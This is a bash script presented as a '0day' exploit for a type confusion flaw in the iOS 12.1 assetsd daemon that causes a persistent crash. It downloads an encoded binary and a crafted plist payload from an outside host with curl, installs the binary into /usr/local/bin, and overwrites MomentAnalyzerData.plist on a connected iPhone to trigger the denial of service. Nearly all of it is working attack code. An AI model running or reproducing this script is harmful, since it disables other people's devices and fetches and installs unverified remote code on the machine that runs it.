#!/usr/bin/env bash

### assetsd iOS 12.1 type confusion vulnerability / persistant DoS
### Created by Rhaym Jailbreaker 09/25/2018.
### Licensed under the MIT License
### This is a 0day at this time


# CONSOLE INIT
clear
echo "==== Assetsd Type Confusion - iOS <= 12.1 ===="
echo "= Created by: rhaym jailbreaker             ===="
echo "=============================================="
echo " "
echo "Please connect your iPhone and wait a few..."
sleep 10

# INITIAL SETUP
echo "Creating exploit tmp directory..."
mkdir -p "/tmp/assetsd_09_2018"

# Check whether afcclient is installed, otherwise download and install it
if ! [ -x "$(command -v afcclient)" ]; then
    echo "Downloading requirements..."
    curl "http://exploitation.cool/plataoplomo/exploits/data/afcclient_linux.bin" > "/tmp/assetsd_09_2018/afcclient.bin"
    base64 -D -i "/tmp/assetsd_09_2018/afcclient.bin" -o "/tmp/assetsd_09_2018/afcclient"
    rm "/tmp/assetsd_09_2018/afcclient.bin"
    chmod +x "/tmp/assetsd_09_2018/afcclient"
    mv "/tmp/assetsd_09_2018/afcclient" "/usr/local/bin/afcclient"
fi

# WORKSPACE SETUP
echo "Setting up exploit workspace"
cd "/tmp/assetsd_09_2018"
METADATA_DIR="PhotoData"
VULNERABLE_FILE="MISC/MomentAnalyzerData.plist"

# ARGUMENT HANDLING
if [[ "$1" == "fix" ]]; then
    afcclient rm "$METADATA_DIR/$VULNERABLE_FILE"
    exit;
fi

# PAYLOAD CREATION
echo "Creating payload..."
PAYLOAD="$(curl http://exploitation.cool/plataoplomo/exploits/data/MomentAnalyzerData.plist)";
echo -e "$PAYLOAD" > "MomentAnalyzerData.plist"

# IPHONE BACKUP
echo "Backing up..."
afcclient get "$METADATA_DIR/$VULNERABLE_FILE" "Backup.dat"

# EXPLOITATION
echo "Uploading exploit..."
afcclient rm "$METADATA_DIR/$VULNERABLE_FILE"
afcclient put "MomentAnalyzerData.plist" "$METADATA_DIR/$VULNERABLE_FILE"
rm "MomentAnalyzerData.plist"

# POST_EXPLOITATION
if [ -x "$(command -v idevicesyslog)" ]; then
    echo -e "We will start the systemlog now, the bug should appear there as a crash including registers, but this may take some time!\n"
    idevicesyslog | grep "/System/Library/Frameworks/AssetsLibrary.framework/Support/assetsd" -A 185
    echo "You can restart your device and run idevicesyslog to verify it is persistant, or take a look at the Settings>Privacy>Analytics on the device"
    echo "To fix assetsd simply run this with the following argument: fix"
else
    echo "Done. You can verify the occasion of the bug in Settings>Privacy>Analytics on the device (look for assetsd)"
fi

